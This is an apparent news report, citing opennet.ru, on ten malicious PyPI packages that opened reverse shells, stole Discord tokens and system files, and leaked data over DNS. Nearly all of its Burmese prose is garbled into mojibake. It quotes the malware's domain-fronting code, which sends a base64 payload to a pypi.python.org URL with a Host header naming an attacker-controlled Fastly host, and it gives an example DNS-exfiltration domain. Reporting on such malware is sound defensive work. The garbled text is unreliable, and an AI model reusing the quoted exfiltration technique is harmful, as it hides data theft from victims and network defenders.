PyPI (Python Package Index) áááºážááœáŸááºááœááºá á¡áá¹ááá¬ááºááŸááá±á¬áá¯ááºáá«ááŸááá±á¬ áááºáá±á·áá»áº áá áá¯ááᯠáá±á¬áºáá¯ááºáá²á·áááºá ááŒá¿áá¬áá»á¬ážááᯠááá±á¬áºáá¯ááºáá®ááœáẠáááºáá±á·áá»áºáá»á¬ážááᯠá á¯á á¯áá±á«ááºáž á¡ááŒáááºáá± ááááá ááá·áº áá±á«ááºážáá¯ááºáá¯ááºáá²á·áááºá ááœá±á·ááŸááá¬ážááá·áº á¡áá¹ááá¬ááºááŸááá±á¬ áááºáá±á·áá»áºáá»á¬ážááẠááá¯ááºááá¯ááºáá°áá»á¬ážááá¬áá¬áá»á¬ážááŸáá·áº áááºááœááºáá±ážáááºážááŒá±á¬ááºážáá»á¬ážááᯠáá¯á¶ážááœááºááẠáááºážááŒá¬ážáá±á¬áááºážáááºážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááá·áºá¡ááœáẠááŸááºáá¬ážááœááºáá±á¬ááºážáááºá
- á¡áá±ážááŒá®ážáá±á¬áááºáá±á·ááºá» (6305 áá±á«ááºážáá¯ááºáá»á¬áž)á á¡áá±ážááŒá®ážáá±á¬ áááºáá±á·ááºá» (12897) - á áá Ạ(ááŒá±á¬ááºážááŒááºááŸá²ááº) ááá¯á· shell áááºáá±á¬ááºááœáá·áºááᯠáá¶á·ááá¯ážáá±ážááẠpypi.python.org ááŸáá·áº áá»áááºáááºááŒááºážá á¡ááœááºá¡ááŒááºá¡á±á¬ááºááœáẠááŒááºááá¬áá¬áá áºáá¯ááŸáá·áº áá»áááºáááºááŸá¯ááᯠáááºáá±á¬ááºáá²á·ááŒá®áž áááºážááᯠáá¯á¶ážááœááºáááºá¡ááœáẠtrevorc2 áááá¯ááááºááᯠá¡áá¯á¶ážááŒá¯áá²á·áááºá áááºááœááºáá±ážáááºážááŒá±á¬ááºážá
- pptest (10001)á ipboards (946) - á áá áºááŸáá·áºáááºáááºáá±á¬ á¡áá»ááºá¡áááºáá»á¬ážááᯠááá¯á·ááœáŸááºáááºá¡ááœáẠáááºááœááºáá±ážáááºážááŒá±á¬ááºážáá áºáá¯á¡áá±ááŒáá·áº DNS ááá¯á¡áá¯á¶ážááŒá¯áá²á·ááẠ(ááááááºáááºááœáẠáááºáá¶áá°á¡áááºá á¡áá¯ááºáááºážááœáŸááºá á¡ááœááºážááŸáá·áº ááŒááºá IPá áá¯áááááœáẠ- á¡áá¯á¶ážááŒá¯áá°á¡áááºááŸáá·áº áááºáá¶áá°á¡áááº) .
- owlmoon (3285)á DiscordSafety (557)á yiffparty (1859) - á áá áºá¡ááœááºážááŸá Discord áááºáá±á¬ááºááŸá¯ ááá¯áááºááᯠáá±á¬áºáá¯ááºááŒá®áž ááŒááºáá¡áááºááŸááºáᶠáá±ážááá¯á·áááºá
- trrfab (287) - áááºááŸááºáá»ááºá áááºáá¶áá°á¡áááºááŸáá·áº /etc/passwdá /etc/hostsá /home á ááŒááºáá¡áááºááŸááºáá¶ááá¯á· áá±ážááá¯á·áááºá
- 10Cent10 (490) - ááŒááºá host áá áºáá¯ááŸáá·áº ááŒá±á¬ááºážááŒáẠshell áá»áááºáááºááŸá¯ááᯠáááºáá±á¬ááºáá²á·áááºá
- yandex-yt (4183) - nda.ya.ru (api.ya.cc) ááŸáááá·áº áá¯ááºááŒááºááá·áº áá±á¬ááºáááºáá¯ááºáá±á¬ááºááŸá¯áá»á¬ážá¡ááŒá±á¬ááºáž á¡ááá¯á¡áá»ááºá¡áááºáá»á¬ážáá«ááŸáááá·áº á á¬áá»ááºááŸá¬áá áºáá¯ááá¯á· á áá áºá¡áá±ážá¡áá°áá¶áááŒááºážá¡ááŒá±á¬ááºáž áááºáá±á·áá»áºááᯠááŒááá¬ážáááºá
á¡áá°ážáááááŒá¯áááºááŸá¬ á¡áá±ážááŒá®ážáá±á¬áááºáá±á·áá»áºááŸáá·áº á¡áá±ážááŒá®ážáá±á¬ áááºáá±á·áá»áºáá»á¬ážááœáẠá¡áá¯á¶ážááŒá¯ááá·áº ááŒááºáá¡áááºááŸááºáá»á¬ážááᯠáááºáá±á¬ááºá¡áá¯á¶ážááŒá¯ááá·áºáááºážáááºážááŒá áºááŒá®áž áááºážááá¯á·ááá¯ááºáá±á¬ááºáá»ááºááá¯áá»á±á¬ááºááẠPyPI áááºážááœáŸááºááœááºá¡áá¯á¶ážááŒá¯ááá·áº Fastly content delivery network ááᯠá¡áá¯á¶ážááŒá¯áá¬ážáááºá á¡ááŸááºááááºááœááºá áá±á¬ááºážááá¯áá»ááºáá»á¬ážááẠpypi.python.org áá¬áá¬ááá¯á· áá±ážááá¯á·áá²á·ááẠ( HTTPS áá±á¬ááºážááá¯ááŸá¯á¡ááœááºáž SNI ááœáẠpython.org á¡áááºááᯠáááºááŸááºááŒááºážá¡áá«á¡áááº)á ááá¯á·áá±á¬áº HTTP âHostâ áá±á«ááºážá á®ážááœáẠááá¯ááºááá¯ááºáá°áá»á¬áž ááááºážáá»á¯ááºáá¬ážáá±á¬ áá¬áá¬á¡áááºáá«ááŸáááẠ(sec. forward.io. global.prod.fastly.net)á á¡ááŒá±á¬ááºážá¡áá¬áá±ážááá¯á·ááŒááºážááœááºáááºááẠáá±áá¬áá±ážááá¯á·ááá·áºá¡áá«ááœáẠTLS áá»áááºáááºááŸá¯ááá±á¬ááºáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯á ááá¯ááºááá¯ááºááá·áºáá¬áá¬áᶠá¡áá¬ážáá°áá±á¬ááºážááá¯ááŸá¯áá áºáá¯ááᯠáá±ážááá¯á·áá²á·áááºá
PyPI á¡ááŒá±áá¶á¡áá±á¬ááºá¡áŠá¡á¬áž áá¯á¶ááŸááºáá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠcache ááŒá¯áá¯ááºáááºá¡ááœáẠVarnish ááœáá·áºáááºážááŒááºáá¬áá±á¬ááá±á¬ááºá á®ááᯠá¡áá¯á¶ážááŒá¯áᬠá¡áá¯á¶ážáá¬áá¬áá»á¬ážááœáẠHTTPS áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠááá±á¬ááºá á®ááŸáá áºááá·áº áá±ážááá¯á·áááºááá¯ááºáá²á CDN á¡ááá·áºááœáẠTLS áááºááŸááºáá¯ááºáá±á¬ááºááŒááºážááá¯áááºáž á¡áá¯á¶ážááŒá¯áá«áááºá áá áºááŸááºá¡áááºááŸáẠáááºááá¯á·áááºááŸáá á±áá¬áá° HTTP âHostâ áá±á«ááºážá á®ážááᯠá¡áá¯á¶ážááŒá¯á á¡ááá¯ááŸááá±á¬ host ááᯠáá¯á¶ážááŒááºáá±ážááá·áº ááá±á¬ááºá á®ááá¯á· áá±á¬ááºážááá¯ááŸá¯áá»á¬áž áá±ážááá¯á·áá¬ážááŒá®ážá áááºáá¶áá° ááá¯ááááºážá¡áááºáá»á¬ážááᯠFastly client á¡á¬ážáá¯á¶ážá¡ááœáẠáá¯á¶ááŸááºááŒá áºááá·áº CDN load balancer IP ááááºá á¬áá»á¬ážááŸáá·áº áá»áááºáááºáá¬ážáááºá
ááá¯ááºááá¯ááºáá°áá»á¬ážááá¬áá¬ááẠáá°ááá¯ááºážá¡á¬áž á¡ááá²á·á¡á á®á¡á ááºáá»á¬ážáá±ážááá·áºá¡ááŒáẠá¡áááºáááááŸááºáá¯á¶áááºááŒááºážááá¯ááẠááœáá·áºááŒá¯áá±ážááá·áº CDN Fastly ááŒáá·áºáááºáž ááŸááºáá¯á¶áááºáá«áááºá "ááŒá±á¬ááºážááŒááºá¡ááœá¶" ááá¯áááºáá®ážááá·áºá¡áá« áá¬ážáá±á¬ááºáᶠáá±á¬ááºážááá¯ááŸá¯áá»á¬ážáá±ážááá¯á·ááẠá¡á á®á¡á ááºáá áºáá¯ááá¯áááºáž á¡áá¯á¶ážááŒá¯áá±á¬áºáááºáž ááá¯ááºááá¯ááºáá°áá¡áááºááŸááºáááºá០á áááºáá¯ááºáá±á¬ááºáááºááŸá¬ ááŸááºáá¬ážááœááºáá±á¬ááºážáááºá ááŒááºáááŸá ááá¯ááºááá¯ááºáá°áá»á¬ážááá¬áá¬ááŸáá·áº á¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááŸá¯ááẠPyPI TLS á¡ááá¡ááŸááºááŒá¯áááºááŸááºááᯠá¡áá¯á¶ážááŒá¯á áá¯ááºááŸááºáá¬ážáá±á¬ PyPI áááºážááœáŸááºááŸáá·áº ááá¬ážáááºá ááºááŸááºáá áºáá¯ááŸáá·áºáá°áááºá "domain fronting" áá¯áá°áááá»á¬ážáá±á¬ á¡áá¬ážáá°áááºážááá¬ááᯠááááºááá¯á·ááŒááºážááá¯áá»á±á¬áºááŒááºááá·áºá¡áá«ááœáẠhost name ááá¯ááŸááºáá¬ážáááºá á¡áá»áá¯á·áá±á¬ CDN ááœááºáááºáá»á¬ážááœáẠHTTPS ááá¯áááºáá±á¬ááºá¡áá¯á¶ážááŒá¯ááẠáá¶á·ááá¯ážáá±ážááá¯ááºá áœááºážááá¯á¡áá¯á¶ážááŒá¯á SNI ááœáẠá áááºáá°ážáááºá¡áááºááŸááºáá áºáŠážááᯠááœáŸááºááŒááŒá®áž á¡ááŸááºááááºáá±ážááá¯á·ááŒááºážáá¡áááºááᯠá¡áá¯á¶ážááŒá¯áá¬ážáááºá TLS á ááºááŸááºá¡ááœááºáž HTTP Host áá±á«ááºážá á®ážááœáẠáááºáá¶áá°á¡á¬áž áá±á¬ááºážááá¯áá¬ážáááºá
á¡áá¹ááá¬ááºááŸááá±á¬ áá¯ááºáá±á¬ááºáá»ááºááᯠáá¯á¶ážááœááºáááºá TrevorC2 áááºáá±á·áá»áºááᯠáá¬áá¬ááŸáá·áº áá¯á¶ááŸááºáááºáááºážááœáŸááºááŒááºážáááºáá°ááá·áº á¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááŸá¯ááŒá¯áá¯ááºááẠáááºáá±á¬ááºážá¡áá¯á¶ážááŒá¯áá²á·áááºá á¥ááá¬á áá¯á¶á¡á¬áž áá±á«ááºážáá¯ááºáá¯ááºááŒááºážá¡ááœááºááŒáá·áº âhttps://pypi.python.org/images/ ááœáẠá¡áá¹ááá¬ááºááŸááá±á¬ áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠáá±ážááá¯á·áá²á·áááºá guid=â áááºážááœáŸááºáá±á¬ááºá¡ááœááºáž ááááºážá¡áá»ááºá¡áááºáá¯ááºááŒáá·áº url = "https://pypi.python.org" + "/images" + "?" + âguid=â + b64_payload r = request.Request(url, headers = {'Host'- âpsec.forward.io.global.prod.fastly.netâ})
pptest ááŸáá·áº ipboards packages áá»á¬ážááẠDNS server ááá¯á· queries áá»á¬ážááœáẠá¡áá¯á¶ážáááºáá±á¬ á¡áá»ááºá¡áááºáá»á¬ážááᯠáá¯ááºááœááºážááŒááºážá¡áá±á«áº á¡ááŒá±áá¶á ááœááºáááºáá¯ááºáá±á¬ááºáá»ááºááᯠáá¯á¶ážááœááºááẠááœá²ááŒá¬ážáá±á¬áááºážáááºážááᯠá¡áá¯á¶ážááŒá¯áá²á·áááºá Malware ááẠânu4timjagq4fimbuhe.example.comâ áá²á·ááá¯á· DNS áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠáá¯ááºáá±á¬ááºááŒááºážááŒáá·áº á¡áá»ááºá¡áááºáá»á¬ážááᯠááááºážáá»á¯ááºáá¬áá¬ááá¯á· ááá¯á·ááœáŸááºáá±á¬ áá±áá¬ááᯠááá¯ááááºážááœá²á¡áááºááŸá base64 áá±á¬áºáááºááŒáá·áº áá¯ááºáá¶áá«ááºááŒáá·áº áá±ážááá¯á·áá«áááºá á¥ááá¬.com ááá¯ááááºážá¡ááœáẠDNS áá¬áá¬ááᯠááááºážáá»á¯ááºááŒááºážááŒáá·áº ááá¯ááºááá¯ááºáá°ááẠá€á
á¬áá»á¬ážááᯠáááºáá¶áááŸáááẠá
source: opennet.ru